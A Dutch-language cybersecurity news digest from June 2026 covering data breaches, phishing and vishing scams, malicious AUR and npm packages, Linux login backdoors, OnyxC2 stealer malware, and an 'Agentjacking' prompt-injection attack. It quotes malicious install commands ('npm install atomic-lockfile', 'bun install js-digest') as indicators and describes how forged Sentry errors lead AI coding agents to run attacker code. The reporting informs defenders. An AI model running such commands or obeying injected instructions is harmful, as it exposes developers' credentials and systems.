De ShinyHunters afpersingsgroep heeft dinsdag de verantwoordelijkheid voor de aanval opgeëist en als bewijs een archief met naar verluidt gestolen documenten gedeeld. Op hun lekwebsite op het darkweb beweert de groep meer dan 40 GB aan documenten te hebben gestolen. Deze data omvat financiële gegevens van studenten, facturatie- en betaalinformatie, creditcard- en betaalgegevens, en exportbestanden van campusportalen. De diefstal betreft gegevens van de Universiteit van Nottingham en haar campussen in Maleisië en China.

ShinyHunters heeft verder aangegeven dat de gestolen documenten de volledige namen, huisadressen, IP-adressen, telefoonnummers en geboortedata van de getroffen studenten bevatten. Na analyse van de gelekte gegevens bevestigde de inbreukmeldingsdienst Have I Been Pwned op woensdag dat de datalek 454.600 voormalige en huidige studenten treft. De gelekte informatie omvat e-mailadressen, samen met uitgebreide persoonlijke gegevens zoals namen, adressen, telefoonnummers, etniciteit, handicaps, paspoortnummers en informatie met betrekking tot academische inschrijvingen en collegegeldbetalingen.

Deze aanval maakt deel uit van een bredere campagne voor datadiefstal door de ShinyHunters-groep, waarbij meer dan 100 organisaties wereldwijd zijn getroffen. Eerder werd gemeld dat de groep data heeft gestolen door in te breken in cloud- en on-premises Oracle PeopleSoft-instanties. PeopleSoft is een zakelijke software suite die wordt gebruikt voor het beheer van grootschalige operaties zoals personeelszaken, financiën, salarisadministratie, supply chain, inkoop en campusadministratie.

Volgens ShinyHunters maakt de groep gebruik van een "gadgetketen" van zero-days en oudere kwetsbaarheden in hun aanvallen. Ze merkten op dat de aanval niet op alle systemen werkt, waarschijnlijk omdat succesvolle exploitatie afhankelijk is van de configuratie van elke instantie. Oracle bracht op 11 juni 2026 een noodpatch uit voor een kritiek PeopleSoft-lek (CVE-2026-35273), maar maakte daarin geen melding van bevestigd actief misbruik.

De Universiteit van Nottingham is de tweede Britse universiteit die in korte tijd een datalek heeft gemeld. Vorige week maakte de Universiteit van Oxford bekend dat haar CareerConnect-platform voor carrièrediensten op 28 mei was gecompromitteerd. Eerder in mei meldde de Universiteit van Oxford ook een tweede datalek, na de inbraak van ShinyHunters in het Canvas leermanagementsysteem (LMS) van Instructure.

 

Bron: Nottingham University | Bron 2: haveibeenpwned.com | Bron 3: ox.ac.uk

12 juni 2026 | Dreigingsactor biedt vermeende interne GitHub dump van Dynatrace te koop aan

Een dreigingsactor adverteert op een hackingforum een vermeende dump van de interne GitHub-organisatie van Dynatrace, een vooraanstaande leverancier van een veelgebruikt observability-platform. Dynatrace heeft een beurswaarde van circa 13,2 miljard dollar. De dataset zou 246 repositories en circa 8,5 GB aan data omvatten. Volgens de actor is de data verkregen via een gecompromitteerde Personal Access Token (PAT) van een ontwikkelaar.

De actor claimt dat de dump cruciale informatie bevat, waaronder infrastructuurtopologie, configuraties voor continue integratie en continue levering (CI/CD), details over Kubernetes-beheer, Terraform-modules, informatie over ArgoCD-implementatie, verwijzingen naar cloudaccounts en interne implementatie-omgevingen. Deze vermeende data wordt aangeboden voor een prijs van 12.000 dollar. De dreigingsactor beweert dat de informatie waardevol kan zijn voor het in kaart brengen van de interne cloud- en softwareleveringsomgevingen van Dynatrace.

De authenticiteit van de geclaimde dump is tot op heden niet onafhankelijk geverifieerd. Dynatrace heeft bovendien geen publieke reactie gegeven op de claims. De blootstelling van CI/CD-infrastructuur en interne repositories vormt een aanzienlijk supply-chain-risico. Gelekte tokens, pipelines, cloudomgevingen en service-accounts kunnen aanvallers een alternatieve route bieden om systemen te compromitteren, waarbij traditionele kwetsbaarheden worden omzeild. Dit incident is relevant voor veel organisaties, ook in Nederland en België, die het platform van Dynatrace gebruiken voor de monitoring van hun applicaties en infrastructuur.

 

Bron: Cybercrimeinfo

12 juni 2026 | Phishinggolf uit naam van Belastingdienst dreigt met conservatoir beslag

Oplichters versturen momenteel phishingmails uit naam van de Belastingdienst, waarin ontvangers wordt opgedragen een bedrag van 2.758 euro te betalen. Het doel van deze dreiging is het voorkomen van zogenaamd conservatoir beslag op hun bezittingen. De mails bevatten een specifiek zaaknummer (7.07) en hanteren een strikte betaaldeadline, waarbij de boodschap wordt uitgedragen als een laatste kans om de betaling te voldoen.

Het consumentenplatform Opgelicht?! van AVROTROS heeft een waarschuwing uitgegeven voor deze actieve campagne. De cybercriminelen maken gebruik van diverse social engineering technieken, waaronder het creëren van tijdsdruk, de dreiging met een gerechtsdeurwaarder en een onpersoonlijke aanhef om ontvangers te manipuleren. Indien ontvangers overgaan tot betaling, wordt het geld overgemaakt naar de oplichters. Bovendien kunnen links in de malafide e-mails leiden tot de installatie van malware op het systeem van de gebruiker.

De Belastingdienst benadrukt dat zij nooit directe betaalverzoeken per e-mail verstuurt en ook nooit via een link om persoonlijke gegevens vraagt. Bij een daadwerkelijke schuld zal de Belastingdienst altijd een officiële brief of een aanslag met gedetailleerde betaalinformatie per post versturen. Het dringende advies aan ontvangers van dergelijke phishingmails is om de e-mail direct te verwijderen, niet op de meegeleverde links te klikken en bij enige twijfel zelf contact op te nemen met de Belastingdienst via de officiële kanalen.

 

Bron: Opgelicht?! (AVROTROS)

13 juni 2026 | Maine schakelt portaal voor datalekmeldingen uit na publicatie van valse meldingen

De Amerikaanse staat Maine heeft zijn openbare portaal voor datalekmeldingen tijdelijk buiten gebruik gesteld, nadat er frauduleuze meldingen van datalekken op de website van de staat waren gepubliceerd. Dit incident heeft geleid tot een herziening van de procedures om toekomstig misbruik te voorkomen.

Eerder werd gemeld dat valse datalekmeldingen waren ingediend bij het officiële meldingsportaal van Maine, waarbij de indieners zich voordeden als Discord en het sociale virtual reality platform VRChat. VRChat bevestigde destijds dat de melding frauduleus was en ingediend door een fictieve medewerker.

In een verklaring van vrijdag erkende het kantoor van de Attorney General van Maine dat er "hoaxes" (grappen of misleidingen) waren ingediend via het meldingssysteem voor datalekken. De verklaring luidde: "Het kantoor van de Attorney General van Maine is op de hoogte gebracht van een ogenschijnlijk misbruik van ons systeem voor datalekrapportage. Na gesprekken met VRChat, een van de twee getroffen bedrijven, is duidelijk geworden dat de gemelde datalekken hoaxes waren, ingediend door een onbekende entiteit die geen verband houdt met een van beide bedrijven. Deze valse meldingen zijn uit de database verwijderd. We hebben geen kennis van recente legitieme datalekmeldingen van VRChat of Discord."

Het kantoor van de Attorney General heeft nu de openbare toegang tot de database met datalekmeldingen tijdelijk uitgeschakeld, terwijl het de rapportageprocedures herziet om dergelijk misbruik in de toekomst te verminderen. Vóór de deactivering werden ingediende meldingen automatisch gepubliceerd in de openbare database.

Het kantoor van de Attorney General van Maine liet weten dat bedrijven nog steeds datalekmeldingen kunnen indienen via de meldingsdienst, maar dat leden van het publiek die kopieën van de meldingen willen inzien, nu rechtstreeks contact moeten opnemen met het kantoor van de Attorney General.

Het datalekportaal van Maine wordt vaak gebruikt door journalisten, onderzoekers en bedrijven die zich bezighouden met dreigingsinformatie om nieuw bekendgemaakte beveiligingsincidenten te monitoren en te bepalen of organisaties cyberaanvallen of datalekken die consumenten treffen, rapporteren. Het incident toont aan hoe automatisch gepubliceerde datalekmeldingen misbruikt kunnen worden om desinformatie te verspreiden en de reputatie van een bedrijf te schaden.

De frauduleuze VRChat-melding beweerde dat het bedrijf een datalek had geleden waarbij meer dan 2,4 miljoen mensen waren getroffen, en bevatte een gefabriceerde contactnaam van een medewerker in de openbaarmaking. Nadat VRChat werd gecontacteerd over de melding, bevestigde het bedrijf dat de openbaarmaking vals was en verklaarde het geen melding te hebben ingediend bij de autoriteiten van Maine. Er is geen reactie ontvangen van Discord over de frauduleuze melding. Het is onduidelijk hoeveel aanvullende frauduleuze datalekmeldingen mogelijk zijn ingediend via het portaal voordat de staat de openbare toegang tot de database opschortte.

 

Bron: Maine Attorney General's Office | Bron 2: documentcloud.org

13 juni 2026 | Meer dan 400 Arch Linux AUR-pakketten gekaapt voor infostealer en eBPF rootkit

Aanvallers hebben deze week meer dan 400 pakketten in de Arch User Repository (AUR) overgenomen en hun bouwscripts herschreven om een credential stealer te installeren op machines die deze pakketten bouwden. De aanval, die op of na 11 juni plaatsvond, richt zich op het vertrouwensmodel van de community repository, niet op een softwarekwetsbaarheid. Er was geen sprake van een exploit, zero-day of inbraak in de officiële Arch systemen.

De malware is een Rust binary die is ontworpen om developer secrets te verzamelen. Wanneer het met root-rechten landt, kan het ook een eBPF rootkit laden om zichzelf te verbergen. Deze rootkit wordt niet gebruikt om privileges te verkrijgen, maar om processen, procesnamen en socket inodes te verbergen voor standaardtools en om debuggers te blokkeren.

De aanvallers adopteerden verlaten projecten, pakketten waarvan de maintainers waren vertrokken, en bewerkten de PKGBUILD of .install scripts. Ze spoofden ook git commit metadata om de wijzigingen te laten lijken alsof ze afkomstig waren van een langdurige maintainer. Deze account bleek later nooit gecompromitteerd te zijn.

Eenmaal geadopteerd, werd het pakketscript aangepast om `npm install atomic-lockfile` uit te voeren tijdens het bouwproces. Dit trok een kwaadaardig npm-pakket, `atomic-lockfile@1.4.2`, binnen naast enkele legitieme pakketten. Dit kwaadaardige pakket bevat een preinstall hook die een gebundelde Linux ELF genaamd `deps` uitvoert. Confirmede voorbeelden die zijn gemeld aan de Arch mailinglist omvatten de `alvr` en `premake-git` pakketten.

De `deps` payload is een Rust credential stealer gericht op developer workstations en build systems. Het verzamelt cookies, tokens en lokale opslag van Chromium-gebaseerde browsers (zoals Chrome, Edge, Brave), sessiedata van Electron apps (waaronder Slack, Discord en Microsoft Teams), GitHub-, npm- en HashiCorp Vault-tokens, plus OpenAI/ChatGPT bearer materiaal en account metadata. Verder worden SSH-sleutels, known_hosts en shell histories, evenals Docker- en Podman-credentials en VPN-profielen gestolen.

Gestolen bestanden worden via HTTP naar `temp.sh` verzonden. Command and control verloopt via een Tor onion service via een lokale loopback proxy. Voor persistentie installeert de malware een systemd service met `Restart=always`. Met root-rechten kopieert het zichzelf naar `/var/lib/` en schrijft een unit onder `/etc/systemd/system/`; als normale gebruiker maakt het gebruik van de home directory en een per-user unit onder `~/.config/systemd/user/`.

Sonatype, die de campagne de naam "Atomic Arch" gaf, telde aanvankelijk meer dan 20 gekaapte pakketten. Binnen een dag groeide dit aantal tot meer dan 400, met geconsolideerde lijsten die nog hoger opliepen. Het `atomic-lockfile` npm-pakket zelf toonde slechts 134 wekelijkse downloads voordat het uit het register werd verwijderd, wat aangeeft dat de blootstelling voornamelijk via het AUR-bouwpad plaatsvond.

Een tweede aanvalsgolf gebruikte `bun install js-digest`, gepusht vanuit een aparte set accounts die door community trackers worden gekoppeld aan dezelfde npm-publisher als `atomic-lockfile`. De payload hiervan is een andere binary, die ook als kwaadaardig is geïdentificeerd.

Arch maintainers herstellen de kwaadaardige commits, blokkeren de accounts en vragen gebruikers om verdachte pakketten te blijven melden. Gebruikers die op of na 11 juni een AUR-pakket hebben geïnstalleerd of bijgewerkt, dienen hun systemen te controleren. Dit omvat het vergelijken van geïnstalleerde pakketten met communitylijsten, controleren van recente bouwgeschiedenis en caches op `npm install atomic-lockfile`, `bun install js-digest` en het payloadpad `src/hooks/deps`. Indien een gemarkeerd pakket is uitgevoerd, moet de host als gecompromitteerd worden beschouwd. Alle aangetaste credentials, zoals browser sessies, SSH-sleutels, GitHub- en npm-tokens, Slack-, Teams- en Discord-sessies, Vault-tokens, Docker- en Podman-credentials en cloud keys, moeten worden geroteerd. Bovendien moet worden gezocht naar persistentie, zoals onbekende systemd services en onverwachte bestanden onder `/var/lib/`, en naar de BPF-maps `hidden_pids`, `hidden_names` en `hidden_inode` onder `/sys/fs/bpf/`. Het verwijderen van het AUR-pakket is niet voldoende zodra de payload is uitgevoerd.

 

Bron: Arch Linux

13 juni 2026 | China-gelinkte hackers jarenlang verborgen in Linux login software

Een geavanceerde, aan China gelinkte dreigingsgroep, door Sygnia getraceerd als 'Velvet Ant', heeft gedurende bijna een decennium onopgemerkt bestaan in de login systemen van Linux. In plaats van zich te verbergen op veelvoorkomende plekken die door verdedigers nauwlettend in de gaten worden gehouden, richtte de groep zich op de Programma's voor Authenticatiediensten (PAM) en OpenSSH componenten die de toegang tot systemen regelen. Door deze kritieke onderdelen te backdooren, creëerden ze een persistente toegang die moeilijk te detecteren en te verwijderen was.

De vroegste sporen van deze activiteit dateren uit 2016. In plaats van nieuwe malware te introduceren die door scanners kon worden opgemerkt, wijzigden de aanvallers de vertrouwde loginprogramma's zelf. Deze aanpak zorgde ervoor dat de activiteiten eruitzagen als normale administratie, waardoor ze onder de radar bleven. Op veel machines werd de hoofd PAM login module vervangen door backdoorde kopieën. Sommige van deze backdoors stonden toegang toe met een geheim wachtwoord, terwijl andere stilletjes gebruikersnamen en wachtwoorden vastlegden van legitieme gebruikers. Onderzoekers ontdekten maar liefst negen verschillende versies van deze gewijzigde modules. Op vergelijkbare wijze werden OpenSSH programma's aangepast om inloggegevens en elk ingetypt commando te loggen, met een verborgen schakelaar om deze logging indien nodig uit te schakelen.

Het bereiken van geïsoleerde netwerken zonder directe internettoegang vereiste extra inspanning van de aanvallers. Ze gebruikten andere vermomde tools en een via internet toegankelijke webserver als brug. Via deze brug werden commando's doorgegeven om externe sessies te openen, diep in het gesegmenteerde netwerk. Omdat het login systeem zelf gecompromitteerd was, hadden normale beveiligingsmaatregelen zoals wachtwoordresets en het beëindigen van sessies weinig effect, aangezien het systeem dat deze referenties controleerde, in dienst stond van de aanvaller.

Deze modus operandi is niet nieuw voor Velvet Ant. Eerdere bevindingen van Sygnia uit 2024 toonden aan dat dezelfde actor internet-geëxponeerde F5 BIG-IP appliances omzette in interne commandoservers. Later dat jaar rapporteerde Sygnia dat de groep een kwetsbaarheid in Cisco NX-OS, CVE-2024-20399, misbruikte om een backdoor op switches te plaatsen. Deze kwetsbaarheid vereist weliswaar reeds admin-toegang, wat het een persistence-tool maakt in plaats van een initiële inbraakmethode. Cisco patchte deze kwetsbaarheid in juli 2024, en CISA markeerde deze de volgende dag als actief misbruikt.

De huidige campagne, genaamd "Operation Highland", is een verdieping van dit concept. Load balancers, switches en de login software zelf worden standaard vertrouwd en zelden grondig gecontroleerd, wat precies de reden is waarom een geduldige aanvaller zich daarin verbergt. Operation Highland is geen probleem dat met één CVE kan worden opgelost; de aanvaller wijzigde vertrouwde programma's na initiële toegang. De oplossing ligt in verificatie, niet alleen in patching. Het opschonen is delicaat, aangezien een verkeerde vervanging admins kan buitensluiten van een live systeem.

Om dergelijke aanvallen te mitigeren, wordt geadviseerd om login bestanden, PAM en OpenSSH programma's en hun sleutelbestanden te monitoren op onverwachte wijzigingen. Organisaties moeten actief zoeken naar veranderingen door programma's te vergelijken met bekende, goede kopieën, in plaats van te wachten op alerts. Cruciaal is dat backdoors eerst worden verwijderd voordat wachtwoorden worden gereset, om te voorkomen dat nieuwe referenties opnieuw worden gestolen. Elke vervanging moet eerst in een lab-omgeving worden getest. Voor de eerdere F5- en Cisco-gevallen geldt dat CVE-2024-20399 op Cisco Nexus-apparatuur gepatcht moet worden en dat F5-systemen moeten worden gecontroleerd op onverwachte uitgaande verbindingen. De bredere les is duidelijk. Infrastructuur die buiten normale monitoring valt, heeft nog steeds integriteitscontroles nodig, inclusief de loginlaag.

 

Bron: Sygnia | Bron 2: nvd.nist.gov

13 juni 2026 | Malafide npm-campagne steelt gevoelige gegevens van ontwikkelaars

Een recente golf van supply chain aanvallen vormt een ernstig risico voor blockchain ontwikkelaars, Web3 teams en cloud engineers. Onderzoekers hebben een gecoördineerde campagne ontdekt waarbij meerdere kwaadaardige pakketten op het npm-register gevoelige gegevens stelen zodra een ontwikkelaar deze installeert. Van SSH private keys en cloud credentials tot wallet phrases en API tokens, deze campagne laat bijna geen geheim ongemoeid.

De schaal van deze operatie is bijzonder verontrustend. Eén pakket dat centraal stond in het onderzoek, moralis-sdk, was ten tijde van de ontdekking al meer dan 2,7 miljoen keer gedownload. Deze enorme reikwijdte betekent dat de kwaadaardige code mogelijk al duizenden ontwikkelaarswerkstations, CI/CD pipelines en cloud omgevingen heeft geïnfecteerd zonder dat dit is opgemerkt.

Analisten van Cyfirma identificeerden de campagne na het opsporen van twee verdachte pakketten, ethers-jss en coinbase-wallet-utils, die beide bedoeld waren om legitieme Ethereum ontwikkelingstools te imiteren. Door verder onderzoek konden zij elf zeer verdachte npm-pakketten koppelen aan dezelfde operatie, zo meldden de onderzoekers van Cyfirma in een rapport dat werd gedeeld met Cyber Security News.

De pakketten waren niet allemaal op dezelfde manier gebouwd. Het onderzoek van Cyfirma onthulde vier verschillende operationele clusters, elk gericht op ontwikkelaars via een andere methode. Sommige misbruikten npm lifecycle hooks om kwaadaardige code automatisch uit te voeren tijdens de installatie, terwijl andere vertrouwden op geobfusceerde loaders en Ethereum smart contracts om command-and-control adressen op te halen zonder iets voor de hand liggends hard te coderen. Samen registreerden deze pakketten meer dan 2,72 miljoen downloads, wat deze campagne tot een van de meest impactvolle npm supply chain campagnes van de laatste tijd maakt. Actieve downloadactiviteit tijdens het onderzoek bevestigde dat verschillende pakketten zelfs na de ontdekking nog steeds nieuwe slachtoffers bereikten.

De infectiemethode was bedrieglijk eenvoudig. Elk pakket gebruikte npm lifecycle scripts, zoals preinstall of postinstall hooks, om kwaadaardige code te activeren zodra een ontwikkelaar een installatiecommando uitvoerde. Er waren geen extra stappen nodig van de kant van het slachtoffer.

Het ethers-jss pakket fungeerde als een kwaadaardige wrapper rond de echte ethers bibliotheek. Eenmaal geïnstalleerd, onderschepte het wallet creatie- en herstelfuncties om private keys en mnemonic phrases te bemachtigen, waarna deze naar een door de aanvaller gecontroleerde server op GitHub Codespaces werden gestuurd. Het pakket bevatte ook een Python script genaamd docker_hunter.py, dat OSINT-achtige zoekacties uitvoerde op Docker Hub repositories die gekoppeld zijn aan blockchain tools.

Het coinbase-wallet-utils pakket richtte zich op verkenning, waarbij het de hostname, gebruikersnaam, omgevingsvariabelen en de werkmap van het slachtoffer verzamelde en vervolgens alles stilzwijgend exfiltreerde met behulp van curl.

Een afzonderlijk cluster van vijf pakketten, gepubliceerd door de npm gebruiker ethcompat, ging verder door gestolen gegevens te versleutelen met AES-256-GCM en deze in te bedden in Ethereum blockchain transacties die naar een door de aanvaller gecontroleerde wallet werden gestuurd. Hierdoor werd de eigen wallet van het slachtoffer gebruikt als exfiltratiekanaal.

Het moralis-sdk pakket was bijzonder sluw. Het begon in oktober 2025 als een schone kopie van de legitieme Moralis SDK, maar werd vervolgens bewapend via een update die een zwaar geobfusceerd postinstall.js bestand toevoegde. Dit bestand gebruikte een YouTube-pagina als een externe activatieschakelaar en leverde de payload alleen als een verborgen marker werd gevonden, waardoor de aanvaller op afstand kon bepalen wanneer de malware werd geactiveerd.

Drie typosquatting pakketten, ganach, solidty en stelar-sdk, voegden een andere innovatieve laag toe. In plaats van een serveradres hard te coderen, bevroegen deze pakketten een Ethereum smart contract om infrastructuurgegevens dynamisch op te halen. De malware downloadde vervolgens platform-specifieke binaries voor Windows, Linux of macOS, afhankelijk van het systeem van het slachtoffer.

Onderzoekers vonden ook verschillende attributie hints. De accounts die werden gebruikt om de pakketten te publiceren hadden willekeurig gegenereerde namen, een veelvoorkomende tactiek om tracering te voorkomen. Gedeobfusceerde code bevatte Russische commentaren en variabelenamen, wijzend op een financieel gemotiveerde actor met ervaring in cryptocurrency-gerelateerde cybercrime, hoewel geen specifieke groep formeel werd genoemd.

Cyfirma raadt aan om installaties uit te voeren met de vlag `npm install --ignore-scripts` om automatische scriptuitvoering te blokkeren. Organisaties moeten ook Software Composition Analysis tools implementeren, voorkomen dat private keys of seed phrases in plaintext worden opgeslagen, en alle blootgestelde gegevens onmiddellijk roteren. Ontwikkelaars in Web3 omgevingen moeten de identiteit van de uitgever, de downloadgeschiedenis en het eigendom van de repository verifiëren voordat zij een onbekend pakket aan hun project toevoegen.

 

Bron: Cyfirma

13 juni 2026 | Safeonweb waarschuwt voor vishing namens Federale Politie

Safeonweb, het Belgische Centrum voor Cybersecurity, waarschuwt voor een actieve vishingcampagne waarbij oplichters zich voordoen als de Federale Politie. Burgers ontvangen telefoontjes van een privé-nummer met een vooraf opgenomen bericht in het Engels. Dit bericht meldt een dringende zaak en instrueert de ontvanger om op toets 1 te drukken om doorverbonden te worden met een zogenaamde medewerker.

Zodra een verbinding tot stand is gebracht, proberen de oplichters, die vaak overtuigend en beleefd communiceren, het vertrouwen van het slachtoffer te winnen. Hun doel is het ontfutselen van gevoelige informatie, zoals persoonlijke gegevens, wachtwoorden of bankgegevens. Safeonweb benadrukt met klem dat de Federale Politie dergelijke informatie nooit telefonisch zal opvragen.

Het is cruciaal om nooit op deze verdachte telefoontjes te reageren, geen persoonlijke informatie door te geven en onmiddellijk op te hangen. Bij het ontvangen van een onverwacht telefoontje, adviseert Safeonweb om nooit persoonlijke gegevens, wachtwoorden, pincodes of digipass-codes telefonisch te delen. Men dient ook nooit terug te bellen naar onbekende nummers en extra waakzaam te zijn bij oproepen van buitenlandse of verborgen nummers. Oplichters zijn getraind in manipulatietechnieken.

Instanties zoals banken, de politie of de overheid zullen nooit telefonisch om codes vragen. Bij twijfel is het raadzaam om de tijd te nemen, rustig na te denken en contact op te nemen met de betreffende instantie via hun officiële, geverifieerde kanalen. Bovendien mag men nooit toegang tot een apparaat geven door op verzoek van een gesprekspartner een externe tool te downloaden, wat kan leiden tot een zogenaamde 'remote access scam'. Indien er toch geld is gestolen, adviseert Safeonweb om snel actie te ondernemen en hun specifieke richtlijnen voor gedupeerden te volgen.

 

Bron: Safeonweb

13 juni 2026 | Nieuwe OnyxC2 Malware-as-a-Service steelt inloggegevens uit 210 applicaties

Een gevaarlijke nieuwe tool voor het stelen van inloggegevens, genaamd OnyxC2, is opgedoken in het cybercriminele circuit. Deze Malware-as-a-Service (MaaS) maakt het voor aanvallers, zelfs met beperkte vaardigheden, eenvoudig om professionele hackoperaties uit te voeren. Voor een maandelijks bedrag van $250 biedt OnyxC2 een compleet pakket waarmee kopers wereldwijd ongemerkt inloggegevens van slachtoffers kunnen stelen. De malware onderscheidt zich door de omvang van de doelwitten omvat meer dan 210 applicaties en browserextensies worden in één keer aangevallen.

OnyxC2 wordt op de markt gebracht als legitieme commerciële software, compleet met een webpaneel, een payload-bouwer, gelaagde prijzen en zelfs terugbetalingen als een build wordt gedetecteerd. Kopers ontvangen een kit die inloggegevens van browsers, wachtwoordbeheerders, twee-factor authenticatiecodes en informatie over cryptowallets steelt. De gestolen gegevens worden teruggestuurd via een versleuteld kanaal, wat detectie door beveiligingstools bemoeilijkt.

Analisten van Blackfog identificeerden de malware en publiceerden hun bevindingen in een rapport, waarin de volledige reikwijdte van de mogelijkheden van OnyxC2 en de detectie-ontwijking werden onthuld. Het onderzoeksteam verkreeg live builds, voerde deze uit in sandbox-omgevingen en bevestigde dat de tool actief verbinding maakt met live command-and-control-infrastructuur.

De malware is geschreven in C++ en maakt gebruik van assemblycode om beveiligingsregels op systeemniveau te omzeilen. Elke build wordt gemuteerd voor levering om detectie door antivirus-signaturen te doorbreken; de ontwikkelaar claimt een ontwijkingspercentage van 99%. Tests van Blackfog bevestigden dit. Beide voorbeeldbuilds die naar VirusTotal werden geüpload, kwamen bij de eerste upload schoon terug, waarbij de malafide component op 30 mei 2026 nog steeds onopgemerkt bleef.

Het potentiële schade is aanzienlijk. Eén geïnfecteerde machine toonde in het paneel al 55 opgeslagen wachtwoorden, 4.717 cookies, 719 autofill-vermeldingen, creditcardgegevens en een cryptowallet, allemaal afkomstig van één host. Een dergelijke buit kan toegang verschaffen tot banksystemen, zakelijke accounts en clouddiensten.

De brede doellijst van OnyxC2 onderscheidt het van eenvoudigere stealers. Het richt zich op 37 browsers gebaseerd op Chromium en 8 browsers gebaseerd op Gecko, plus 95 Chromium- en 14 Gecko-extensies, waaronder 6 speciale twee-factor authenticatie tools. Zelfs accounts die door 2FA zijn beschermd, zijn niet veilig voor deze dreiging. De stealer omvat ook 5 wachtwoordbeheerders, 17 cryptocurrency-wallets, 11 FTP-clients en 5 e-mailclients. Een stealer die wachtwoordbeheerdergegevens samen met actieve sessiecookies buitmaakt, kan zelfs na een wachtwoordwijziging toegang krijgen tot accounts. De FTP- en e-mail-doelwitten breiden de reikwijdte uit van persoonlijke accounts naar bedrijfssystemen die financiële en operationele teams dagelijks gebruiken.

Naast het stelen van inloggegevens, bundelt OnyxC2 een complete toolkit voor externe toegang. Operators kunnen HVNC gebruiken om een verborgen browsersessie te controleren, een keylogger uit te voeren, screenshots te maken en bestanden op afstand te beheren. Een reverse SOCKS5-proxy en een ingebouwde Tor-tunnel maken de toolkit compleet, waardoor aanvallers verkeer anoniem kunnen routeren.

OnyxC2 bereikt slachtoffers via nep-installatiepakketten die zijn vermomd als legitieme software downloads. De lokmiddelen die door onderzoekers zijn gevonden, omvatten pakketten die Fling-Standalone, FinePrint, SystemSettings en nep-Windows-updatebestanden imiteren. Elk malafide archief is met een wachtwoord beveiligd, waardoor het langs geautomatiseerde scantools glipt die bestanden moeten openen om ze te inspecteren. Binnen elk nep-archief bevindt zich een pakket met twee bestanden, gebouwd voor DLL-sideloading. Het eerste bestand is een legitiem ondertekende applicatie die Windows zonder vragen vertrouwt, en het tweede is een malafide DLL die is genoemd naar een bibliotheek die het ondertekende programma bij het opstarten laadt. Wanneer het slachtoffer iets uitvoert dat op een installatieprogramma lijkt, laadt het vertrouwde programma onbewust de code van de aanvaller uit dezelfde map.

De malafide DLL is opgeblazen tot meer dan 120 MB door een echte NVIDIA-grafische bibliotheek te imiteren, met echt ogende geëxporteerde functienamen erin. Veel antivirusscanners slaan grote bestanden over om tijd te besparen, en de daadwerkelijke payload bevindt zich versleuteld binnenin, en wordt pas tijdens runtime gedecodeerd. Blackfog raadt aan om controles voor anti-data-exfiltratie op het endpoint af te dwingen, waarbij uitgaande gegevensoverdrachten op het moment van diefstal worden geblokkeerd, in plaats van uitsluitend te vertrouwen op bestandsscanning.

 

Bron: Blackfog

13 juni 2026 | aanval met Agentjacking misleidt codeeragenten met AI tot uitvoeren kwaadaardige code

Cybersecurityonderzoekers hebben een nieuwe klasse aanvallen beschreven, genaamd 'Agentjacking', die codeeragenten met kunstmatige intelligentie (AI) kan misleiden tot het uitvoeren van willekeurige code op machines van ontwikkelaars. Deze aanval, ontdekt door Tenet Security, wordt geactiveerd door een vervalst foutrapport dat is opgesteld met Sentry, een open source platform voor fouttracking en prestatiemonitoring.

Ron Bobrov, Barak Sternberg en Nevo Poran, beveiligingsonderzoekers bij Tenet Security, legden uit dat de aanval een kritieke architectuurfout uitbuit. Deze fout bevindt zich op het snijvlak van Sentry's event-ingestie, die willekeurige payloads accepteert van iedereen met een DSN (Data Source Name), en de Sentry MCP-server, die deze data terugstuurt naar AI-agenten als vertrouwde systeemoutput. Het concept is om zorgvuldig opgestelde input te injecteren in Sentry-foutmeldingen. Deze meldingen worden vervolgens door codeeragenten zoals Claude Code en Cursor geïnterpreteerd als legitieme stappen voor diagnostische probleemoplossing, waarna ze door de aanvaller gecontroleerde code uitvoeren.

Een succesvolle aanval met Agentjacking kan gevoelige gegevens blootleggen, waaronder omgevingsvariabelen, Git-referenties, URL's van private repositories en identiteiten van ontwikkelaars. Dit gebeurt zonder dat methoden zoals phishing of eerdere servercompromittering nodig zijn. Het probleem ligt in het impliciete vertrouwen dat gepaard gaat met het verbinden met externe services via het Model Context Protocol (MCP). Omdat een AI-agent geen onderscheid kan maken tussen een foutmelding die is gegenereerd door een echte applicatiecrash of een die is geïnjecteerd door een aanvaller, ontstaat er een pad voor willekeurige code-executie wanneer de agent het antwoord verwerkt.

De aanvalsketen, zoals bedacht door Tenet Security, omvat de volgende stappen. Een aanvaller vindt de Sentry DSN van een doelwit, een publieke, alleen-schrijven referentie die is ingebed in websites. De aanvaller stuurt een kwaadaardige foutmelding naar het ingestie-eindpunt van Sentry via een POST-verzoek, gebruikmakend van de DSN. Deze melding bevat "zorgvuldig geformatteerde markdown" in het berichtveld en de namen van context-sleutels. Wanneer de Sentry MCP-server deze melding terugstuurt naar een AI-agent, wordt deze weergegeven als gestructureerde inhoud die visueel identiek is aan het systeemsjabloon van Sentry. Wanneer een ontwikkelaar zijn codeeragent met AI vraagt om "onopgeloste Sentry-problemen te herstellen", bevraagt de agent Sentry via MCP en ontvangt de kwaadaardige melding. De agent voert de kwaadaardige code uit, die draait met de volledige privileges van de ontwikkelaar.

De onderzoekers benadrukten dat "de aanvaller nooit de infrastructuur van het slachtoffer aanraakt." De kwaadaardige instructie arriveert vermomd als een legitieme 'oplossing' binnen een gewone fout. Wanneer een ontwikkelaar zijn AI-agent vraagt om het Sentry-probleem op te lossen, leest de agent het commando van de aanvaller als vertrouwde begeleiding en voert het uit, met de eigen privileges van de ontwikkelaar, op diens eigen machine.

Agentjacking onderscheidt zich door zich te richten op de AI-agent die een ontwikkelaar vertrouwt en door een Sentry DSN als startpunt te gebruiken. De markdown-injectie wordt zodanig weergegeven dat de agent deze niet kan onderscheiden van legitieme Sentry-begeleiding. Het cybersecuritybedrijf met AI-focus heeft minimaal 2.388 organisaties gevonden die kwetsbaar waren met geldige, injecteerbare DSN's. Ze testten de aanval op gecontroleerde wijze tegen meer dan 100 organisaties en behaalden een exploitatie succespercentage van 85% tegen geïnjecteerde fouten bij enkele van de meest gebruikte codeerassistenten met AI.

Sentry heeft het probleem erkend, maar ervoor gekozen het niet te patchen, met de verklaring dat het "technisch niet verdedigbaar" is. Het bedrijf heeft echter wel een wereldwijd inhoudsfilter geactiveerd dat een "specifieke payload-string" blokkeert. Tenet Security waarschuwt dat nu bedrijven massaal codeeragenten met AI implementeren, de agenten zelf het aanvalsoppervlak vormen, gericht tegen de ontwikkelaars die hen vertrouwen, met niets anders dan data die deze organisaties zelf publiceren. De aanval omzeilt EDR, WAF, IAM, VPN, Cloudflare en firewalls, omdat er niets kwaadaardigs te detecteren is; elke actie in de keten is geautoriseerd.

 

Bron: Tenet Security

